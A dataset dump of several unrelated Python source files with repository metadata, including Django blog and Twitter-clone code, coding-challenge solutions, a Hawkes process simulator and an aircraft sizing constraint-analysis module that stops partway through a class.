/src/post/forms.py
|
08f659bf1b2867908d8b5e7df506c9db0eb41b6d
|
[] |
no_license
|
eaglesdgreat/Django-Blog_App
|
06912c6bd794a51880e620c1df418a8c2e7d9051
|
807dd426eaf7926e78591158bfe7f6801258be3a
|
refs/heads/master
| 2021-01-01T21:06:29.951872
| 2020-02-09T16:57:03
| 2020-02-09T17:00:12
| 239,339,352
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 820
|
py
|
from django import forms
from tinymce import TinyMCE
from .models import Post, Comment
class TinyMCEWidget(TinyMCE):
def use_required_attribute(self, *args):
return False
class PostForm(forms.ModelForm):
content = forms.CharField(
widget=TinyMCEWidget(
attrs={'required': False, 'cols': 30, 'rows': 10}
)
)
class Meta:
model = Post
fields = ('title', 'overview', 'content', 'thumbnail', 'categories', 'featured', 'previous_post', 'next_post')
class CommentForm(forms.ModelForm):
content = forms.CharField(widget=forms.Textarea(attrs={
'class': 'form-control',
'placeholder': 'Type Your Comment',
'id': 'usercomment',
'rows': '4'
}))
class Meta:
model = Comment
fields = ('content',)
|
[
"eaglesemmanuel@outlook.com"
] |
eaglesemmanuel@outlook.com
|
48a7e203891d43b65a09396ac8b965695cc0ea38
|
745aa88c09d5cfd8ce49d2f3efcb131c08c1c586
|
/notification/migrations/0001_initial.py
|
159807e220bfa5a090378cf4c1b11f908a7e22e8
|
[] |
no_license
|
Albina93/twitterclone
|
295ff4c157fb36610fa60061b682348d7858d1e2
|
244d1f7015b214fdd2c03f23a41f18141e7c8910
|
refs/heads/master
| 2022-12-11T09:43:17.126680
| 2020-09-04T22:51:14
| 2020-09-04T22:51:14
| 291,776,349
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,000
|
py
|
# Generated by Django 3.1 on 2020-09-04 15:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('tweet', '0002_tweet_twitter_user'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Notification',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_receive', models.DateTimeField(blank=True, default=None, null=True)),
('tweet_receive', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tweet_receive', to='tweet.tweet')),
('user_receive', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='receive', to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"alba.tleubergen@gmail.com"
] |
alba.tleubergen@gmail.com
|
2e3dcc974eae031b9b501b353ec3c65c57bad29f
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03287/s251583838.py
|
449f468833a9876dddf1d4cd0215a01955885e96
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 286
|
py
|
from collections import Counter
N, M = map(int, input().split())
A = [int(i)%M for i in input().split()]
B = [0] * (N+1)
for i in range(N):
B[i+1] = (B[i]+A[i]) % M
counter = dict(Counter(B))
ans = 0
for num in counter:
ans += (counter[num]-1) * counter[num] // 2
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
959a9840ad80fc376d6f2008e5a76bd02c9a731e
|
aad07595625e504988d18509e587e63fd3b4cd38
|
/phase_03/v2.0/utilities/data_processing.py
|
0d1e57e3c9d8a61d57b7f39ee7d266f0a0eeb99c
|
[] |
no_license
|
KumaranShivam5/aurora
|
8533a399ecd7e4c333e2fb36cb536dc6957e523d
|
bde4711baf4d50fa28fc871e2251fda85c4783cf
|
refs/heads/main
| 2023-08-21T09:47:36.601207
| 2021-10-23T20:42:40
| 2021-10-23T20:42:40
| 380,564,957
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,313
|
py
|
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
cv_data = pd.read_csv('cv_data.csv')
xrb_data = pd.read_csv('lmxrb_all_data.csv')
print(cv_data.shape)
print(xrb_data.shape)
#print(cv_data)
all_data = pd.concat([cv_data , xrb_data] , ignore_index=True)
#print(all_data)
#print(all_data.shape)
#all_data['class']
all_data = all_data.sample(frac=1).reset_index(drop=True)
all_data.index.name = "index_compiled"
print('Normalizing data')
#print(all_data)
m, n = all_data.shape
total = m*n
count = 0
for i in range(m):
for j in range(n):
count+=1
per = ((count/total)*100)
if(per%5==0):
print('{:.0f} done'.format(per))
if isinstance(all_data.iloc[i,j],str):
#print(i,j,all_data.iloc[i,j])
try:
all_data.iloc[i,j] = float(all_data.iloc[i,j])
except:
#print('ivalid , setting to zero' , i, j, all_data.iloc[i,j])
all_data.iloc[i,j]=0
np.amax(all_data)
'''
for i in range(2,n):
max_non_zero = np.amax(all_data.iloc[:,i])
if(max_non_zero==0):
continue
else:
all_data.iloc[:,i] = all_data.iloc[:,i] / np.amax(all_data.iloc[:,i])
#print(i)
'''
print(np.amax(all_data))
all_data.to_csv('all_data_compiled_v2.csv')
|
[
"kumaranshivam57@gmail.com"
] |
kumaranshivam57@gmail.com
|
b0d0f187d9d1d4ad21b33bedfbd7788e418c295e
|
7bfa634d1ad17d7c9fbb49fea6d9adf099b9e61b
|
/openprocurement/patchdb/commands/replace_documents_url.py
|
066c4f4f59d2497d500775fd664ee6014b602bd6
|
[
"Apache-2.0"
] |
permissive
|
imaginal/openprocurement.patchdb
|
b46430132ef594b2aa06e46948bc1d076cdbe13c
|
1a612fa97d9ea58bf02294105c787aabc21eeee0
|
refs/heads/master
| 2020-03-13T20:34:23.858470
| 2018-10-01T12:55:59
| 2018-10-01T12:55:59
| 131,277,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,816
|
py
|
import re
from copy import deepcopy
from openprocurement.patchdb.commands import BaseCommand
class Command(BaseCommand):
help = 'Replace domain in documents or auction URL'
required_document_fields = set(['id', 'title', 'format', 'url'])
required_auction_fields = set(['id', 'title', 'value', 'auctionUrl'])
auction_url_search = None
doc_url_search = None
@staticmethod
def add_arguments(parser):
parser.add_argument('--doc-url-search', default='',
help='document URL to search (regexp)')
parser.add_argument('--doc-url-replace', default='',
help='document URL to replace')
parser.add_argument('--auction-url-search', default='',
help='auction URL to search (regexp)')
parser.add_argument('--auction-url-replace', default='',
help='auction URL to replace')
def check_arguments(self, args):
if not args.doc_url_search and not args.auction_url_search:
raise ValueError("Nothing to search")
if args.doc_url_search:
self.doc_url_search = re.compile(args.doc_url_search)
self.doc_url_replace = args.doc_url_replace
if args.auction_url_search:
self.auction_url_search = re.compile(args.auction_url_search)
self.auction_url_replace = args.auction_url_replace
def document_replace_url(self, doc):
if self.doc_url_search and self.doc_url_search.search(doc['url']):
doc['url'] = self.doc_url_search.sub(self.doc_url_replace, doc['url'])
return True
return False
def auction_replace_url(self, doc):
if self.auction_url_search and self.auction_url_search.search(doc['auctionUrl']):
doc['auctionUrl'] = self.auction_url_search.sub(self.auction_url_replace, doc['auctionUrl'])
return True
return False
def recursive_find_and_replace(self, root):
res = 0
if isinstance(root, dict):
if set(root.keys()) >= self.required_document_fields:
res += self.document_replace_url(root)
if set(root.keys()) >= self.required_auction_fields:
res += self.auction_replace_url(root)
for item in root.values():
if isinstance(item, (dict, list)):
res += self.recursive_find_and_replace(item)
elif isinstance(root, list):
for item in root:
res += self.recursive_find_and_replace(item)
return res
def patch_tender(self, patcher, tender, doc):
new = deepcopy(doc)
if self.recursive_find_and_replace(new) > 0:
patcher.save_tender(tender, doc, new)
patcher.check_tender(tender, tender.tenderID)
|
[
"flyonts@gmail.com"
] |
flyonts@gmail.com
|
7208675c1e66c9f8bb478d321635d0e73316df78
|
1294f7aa1c21bf126c26d9ecd0d2cafe1fe1e6c7
|
/simulation.py
|
727c9efd6aa616b1e138eecd09f694aa1bf4761a
|
[] |
no_license
|
woshiyyya/Multivariate-Hawks-Process
|
53eb69954f3cb11de1f19e34482af988f2fc1544
|
961d91542fcfbc0ec89d9575d583f9b713110a2b
|
refs/heads/master
| 2020-06-01T16:21:06.248927
| 2019-06-08T05:22:10
| 2019-06-08T05:22:10
| 190,847,872
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,283
|
py
|
import numpy as np
from math import exp, log
import matplotlib.pyplot as plt
import pickle
from tqdm import tqdm
import os
from argparse import ArgumentParser
U = [0.001, 0, 0.1, 0.005, 0.007, 0.0025, 0.003, 0.0069, 0.0081, 0.0043]
A = [[0.1, 0.072, 0.0044, 0, 0.0023, 0, 0.09, 0, 0.07, 0.025],
[0, 0.05, 0.068, 0, 0.027, 0.065, 0, 0, 0.097, 0],
[0.093, 0, 0.0062, 0.045, 0, 0, 0.053, 0.0095, 0, 0.083],
[0.019, 0.0033, 0, 0.073, 0.058, 0, 0.056, 0, 0, 0],
[0.045, 0.091, 0, 0, 0.066, 0, 0, 0.033, 0.0058, 0],
[0.067, 0, 0, 0, 0, 0.055, 0.063, 0.078, 0.085, 0.0095],
[0, 0.022, 0.0013, 0, 0.057, 0.091, 0.0088, 0.065, 0, 0.073],
[0, 0.09, 0, 0.088, 0, 0.078, 0, 0.09, 0.068, 0],
[0, 0, 0.093, 0, 0.033, 0, 0.069, 0, 0.082, 0.033],
[0.001, 0, 0.089, 0, 0.008, 0, 0.0069, 0, 0, 0.072]
]
w = 0.6
Z = 10
T = 1e5
def intensity(t, dim, history):
infection_weight = A[dim]
decay = [[exp(-w * (t - ti)) for ti in seq] for seq in history]
accumulate_decay = sum([infection_weight[i] * sum(decay[i]) for i in range(Z)])
return U[dim] + accumulate_decay
def multi_intensity(t, history):
intensity_arr = np.array([intensity(t, d, history) for d in range(Z)])
return np.sum(intensity_arr), intensity_arr
def get_candidate(proposal, prob):
assert proposal < sum(prob)
tem_prob = 0
for dim, p in enumerate(prob):
tem_prob += p
if proposal < tem_prob:
return dim
def sample(max_num=100):
t = 0
cnt = 0
history = [[] for _ in range(Z)]
pbar = tqdm(total=max_num)
while cnt < max_num:
prev_lambda, _ = multi_intensity(t, history)
t += -log(np.random.rand()) / prev_lambda
proposal = np.random.rand()
cur_lambda, cur_intensity = multi_intensity(t, history)
if proposal < cur_lambda / prev_lambda:
cur_dim = get_candidate(proposal * prev_lambda, cur_intensity)
history[cur_dim].append(t)
cnt += 1
pbar.update(1)
pbar.close()
return history
def index_events(history):
event_seq = sorted(sum(history, []))
event_mapping = dict()
for i in range(len(history)):
for j, t in enumerate(history[i]):
event_mapping[t] = (i, j)
return event_seq, event_mapping
def display(history, dim):
fig, axs = plt.subplots(2, 1)
x1 = [0] + history[dim]
y1 = [0] + list(range(0, len(history[dim])))
x2 = []
y2 = []
event_seq, event_mapping = index_events(history)
total_events = len(event_seq)
recap_history = [[] for _ in range(Z)]
for k in range(total_events - 1):
t, t_next = event_seq[k], event_seq[k + 1]
i, j = event_mapping[t]
recap_history[i].insert(j, t)
sampled_x = np.linspace(t, t_next, 10).tolist()
sampled_y = []
for xi in sampled_x:
sampled_y.append(intensity(xi, dim, recap_history))
x2.extend(sampled_x)
y2.extend(sampled_y)
start_time = min(x2)
end_time = max(x2)
x1.append(end_time)
y1.append(y1[-1])
x2 = [0, start_time] + x2
y2 = [0, 0] + y2
axs[0].step(x1, y1)
axs[1].plot(x2, y2)
axs[0].set_xlim(0, end_time)
axs[1].set_xlim(0, end_time)
axs[0].set_xlabel('time')
axs[0].set_ylabel(f'Occurrence N(t)')
axs[1].set_xlabel('time')
axs[1].set_ylabel(f'Intensity (dim{dim})')
axs[0].grid(True)
axs[1].grid(True)
fig.tight_layout()
plt.savefig(f'hawks_dim{dim}.png')
plt.show()
def gen_data(max_num, max_seqs):
os.makedirs(f'data/seq{max_num}', exist_ok=True)
for i in range(max_seqs):
history = sample(max_num)
pickle.dump(history, open(f'data/seq{max_num}/sample{max_num}_seq{i}.pkl', 'wb'))
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--max_num', type=int, default=20)
parser.add_argument('--max_seq', type=int, default=20)
parser.add_argument('--gen_data', action='store_true')
args = parser.parse_args()
if args.gen_data:
gen_data(args.max_num, args.max_seq)
exit()
history = sample(args.max_num)
pickle.dump(history, open(f'data/sample{args.max_num}.pkl', 'wb'))
for i in range(Z):
display(history, dim=i)
|
[
"1085966850@qq.com"
] |
1085966850@qq.com
|
2926f51c360641246b891958422680130aa0ffaa
|
d8a1ad97cd53980369e908a5bb5744b5014d9c4e
|
/leetcode/840.magic-squares-in-grid.py
|
718e0a9b1a22f105a2ffe78402433c3e361d409e
|
[
"MIT"
] |
permissive
|
Lonitch/hackerRank
|
9f337b9a737c8abfbb2bae66221701fbc44c47ce
|
879c62dbab75aa73c7af2fdcb88a728a67f2ab8a
|
refs/heads/master
| 2022-08-26T15:02:56.343349
| 2022-07-07T00:52:35
| 2022-07-07T00:52:35
| 218,198,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,976
|
py
|
#
# @lc app=leetcode id=840 lang=python3
#
# [840] Magic Squares In Grid
#
# https://leetcode.com/problems/magic-squares-in-grid/description/
#
# algorithms
# Easy (36.30%)
# Likes: 108
# Dislikes: 972
# Total Accepted: 19.4K
# Total Submissions: 53K
# Testcase Example: '[[4,3,8,4],[9,5,1,9],[2,7,6,2]]'
#
# A 3 x 3 magic square is a 3 x 3 grid filled with distinct numbers from 1 to 9
# such that each row, column, and both diagonals all have the same sum.
#
# Given an grid of integers, how many 3 x 3 "magic square" subgrids are there?
# (Each subgrid is contiguous).
#
#
#
# Example 1:
#
#
# Input: [[4,3,8,4],
# [9,5,1,9],
# [2,7,6,2]]
# Output: 1
# Explanation:
# The following subgrid is a 3 x 3 magic square:
# 438
# 951
# 276
#
# while this one is not:
# 384
# 519
# 762
#
# In total, there is only one magic square inside the given grid.
#
#
# Note:
#
#
# 1 <= grid.length <= 10
# 1 <= grid[0].length <= 10
# 0 <= grid[i][j] <= 15
#
#
#
# @lc code=start
class Solution:
def numMagicSquaresInside(self, grid: List[List[int]]) -> int:
m,n = len(grid),len(grid[0])
if m<3 or n<3:
return 0
ans=0
for i in range(m-2):
for j in range(n-2):
flat = grid[i][j:j+3]+grid[i+1][j:j+3]+grid[i+2][j:j+3]
if len(set(flat))==9 and max(flat)==9:
r1 = sum(grid[i][j:j+3])
r2 = sum(grid[i+1][j:j+3])
r3 = sum(grid[i+2][j:j+3])
c1 = grid[i][j]+grid[i+1][j]+grid[i+2][j]
c2 = grid[i][j+1]+grid[i+1][j+1]+grid[i+2][j+1]
c3 = grid[i][j+2]+grid[i+1][j+2]+grid[i+2][j+2]
d1 = grid[i][j]+grid[i+1][j+1]+grid[i+2][j+2]
d2 = grid[i+2][j]+grid[i+1][j+1]+grid[i][j+2]
if len(set([r1,r2,r3,c1,c2,c3,d1,d2]))==1:
ans+=1
return ans
# @lc code=end
|
[
"invictumltd@gmail.com"
] |
invictumltd@gmail.com
|
2ec9721332ba5fd5e88768b46aac3a1ec52dd43e
|
79df5fd8e03b6c85b4bf111fab363fb9199b5aee
|
/blog/admin.py
|
d8b238d2ce21f1cc5198ae7a89d62882411f7306
|
[] |
no_license
|
gavinleey/blogproject
|
b3353c088ca48c7cf48ed7f9c8f8c1376df50883
|
d099586aaa5129c3cdb560335fb2d70c37afbc1e
|
refs/heads/master
| 2021-01-20T14:22:57.412610
| 2017-05-10T10:19:22
| 2017-05-10T10:19:22
| 90,581,063
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
from django.contrib import admin
# Register your models here.
from .models import Post, Category, Tag
class PostAdmin(admin.ModelAdmin):
list_display = ['title', 'created_time', 'modified_time', 'category', 'author']
admin.site.register(Post, PostAdmin)
admin.site.register(Category)
admin.site.register(Tag)
|
[
"gavinlee_qd@163.com"
] |
gavinlee_qd@163.com
|
712494c2ee5b4dc76831fe44634b66447d5431a6
|
00c6ded41b84008489a126a36657a8dc773626a5
|
/.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPDP1P2_20210714170704.py
|
f31c77b51fea85e47b3f0b9001e527d45d16bf5a
|
[] |
no_license
|
12libao/DEA
|
85f5f4274edf72c7f030a356bae9c499e3afc2ed
|
1c6f8109bbc18c4451a50eacad9b4dedd29682bd
|
refs/heads/master
| 2023-06-17T02:10:40.184423
| 2021-07-16T19:05:18
| 2021-07-16T19:05:18
| 346,111,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,073
|
py
|
# author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysisPD as ca_pd
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
:param n: number of motor
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
self.n = number_of_motor
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
p_w = self.coefficient * \
(self.q / (self.beta * self.w_s) *
cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180)
* v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
V_stall_ld = 62
Cl_max_ld = 2.87
a = 10
w_s = 6000
while a >= 1:
cl = self.beta * w_s / self.q
delta_cl = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
W_S = min(W_S_1, W_S_2)
a = abs(w_s-W_S)
w_s = W_S
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_turbofun.master_equation(
self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, stall_speed, cruise,
service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Mattingly_Method_with_DP_electric:
"""This is a power-based master constraints analysis
the difference between turbofun and electric for constrains analysis:
1. assume the thrust_lapse = 1 for electric propution
2. hp = 1 - hp_turbofun
"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
:param n: number of motor
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp # this is the difference part compare with turbofun
self.n = number_of_motor
# power lapse ratio
self.alpha = 0.75 # this is the difference part compare with turbofun
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = self.hp * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
p_w = self.coefficient * \
(self.q / (self.beta * self.w_s) *
cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180)
* v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
V_stall_ld = 62
Cl_max_ld = 2.87
a = 10
w_s = 6000
while a >= 1:
cl = self.beta * w_s / self.q
delta_cl = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
W_S = min(W_S_1, W_S_2)
a = abs(w_s-W_S)
w_s = W_S
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP_electric.master_equation(
self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, cruise,
service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP_turbofun:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.hp = Hp
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
# equation 9-88, If the wing has winglets the aspect ratio should be corrected
ar_corr = AR * (1 + 1.9 * h / b)
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180)
* v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k *
(load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s *
(self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * \
(self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.32):
V_stall_ld = 62
Cl_max_ld = 2.87
a = 10
w_s = 6000
while a >= 1:
cl = self.beta * w_s / self.q
delta_cl = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=w_s).delta_lift_coefficient(cl)
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + delta_cl)
W_S = min(W_S_1, W_S_2)
a = abs(w_s-W_S)
w_s = W_S
return W_S
allFuncs = [stall_speed, take_off, cruise,
service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP_electric:
"""This is a power-based master constraints analysis based on Gudmundsson_method
the difference between turbofun and electric for constrains analysis:
1. assume the thrust_lapse = 1 for electric propution
2. hp = 1 - hp_turbofun
"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.hp = Hp # this is the difference part compare with turbofun
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = 0.75 # this is the difference part compare with turbofun
h = 2.43 # height of winglets
b = 35.8
# equation 9-88, If the wing has winglets the aspect ratio should be corrected
ar_corr = AR * (1 + 1.9 * h / b)
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = self.hp*self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(
self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
